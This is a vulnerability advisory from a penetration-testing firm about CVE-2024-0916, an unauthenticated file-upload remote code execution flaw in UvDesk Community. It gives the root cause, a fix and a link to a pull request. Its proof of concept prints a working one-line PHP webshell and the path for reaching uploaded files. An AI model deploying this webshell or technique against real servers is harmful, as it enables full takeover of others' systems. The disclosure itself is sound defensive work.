Unauthenticated Remote Code Execution in UvDesk Community

Apr 25, 2024

CVE Number

CVE-2024-0916

Credits

Melvin Mejia of Pentraze Cybersecurity

Summary

An insecure file upload vulnerability has been found in UvDesk Community version 1.1.3 and prior. The issue resides in the ticket creation process where it allows for files to be uploaded as attachments, said files are not sanitized and are stored in a path where they are accessible to unauthenticated users.

CVSS

10.0 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Details

During the ticket creation process, users can attach files. Unfortunately, the application does not adequately verify the type of files uploaded nor does it sanitize the file names and extensions. As a result, these files are directly accessible and executable via the URL pattern: http://<host>/assets/threads/<ticket_id>/<uploaded_file>. The Ticket ID, which is necessary to construct this URL, is either sent to the user’s email address upon ticket creation or can be deduced through simple brute force methods due to its incremental nature.

PoC

  • Vulnerable upload form:

  • Contents of webshell.php:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
  • Demonstration of Code Execution:

Root cause

The vulnerability comes from the following code in UVdesk Core Framework, this is the function used by the support center bundle to upload ticket attachments.

Ref to code: https://github.com/uvdesk/core-framework/blob/864b9ee35202d754d6fb0b73aa80ded749e015f0/FileSystem/UploadManagers/Localhost.php#L78C1-L78C102

The application already has a mechanism to sanitize filenames but for some reason it is not being used at all since this variable’s value defaults to false (see image).

Proposed fix

In a test environment, changing that variable’s value to true is enough to prevent code execution on the server (filename ends up being randomized and the .php extension is stripped from the file). Using the same example file webshell.php this is what I end up with as an attachment.

Requesting said file:

Pull request with the proposed fix: github.com/uvdesk/core-framework/pull/706

Servicios

Pruebas de Penetración

Evaluación proactiva utilizando tácticas, técnicas y procedimientos de atacantes reales para identificar fallas de seguridad, configuraciones incorrectas y vulnerabilidades.

Más información

Seguridad de Aplicaciones

Protección integral de aplicaciones, garantizando la seguridad en todas las fases del desarrollo.

Más información

Ejercicios de Red Team

Simulación avanzada de ataques cibernéticos para evaluar y mejorar la capacidad de respuesta de una organización.

Más información

Gestión de Vulnerabilidades

Proceso proactivo para identificar, priorizar y abordar las vulnerabilidades de seguridad en sistemas y software, mejorando la defensa de una organización contra las amenazas cibernéticas en evolución.

Más información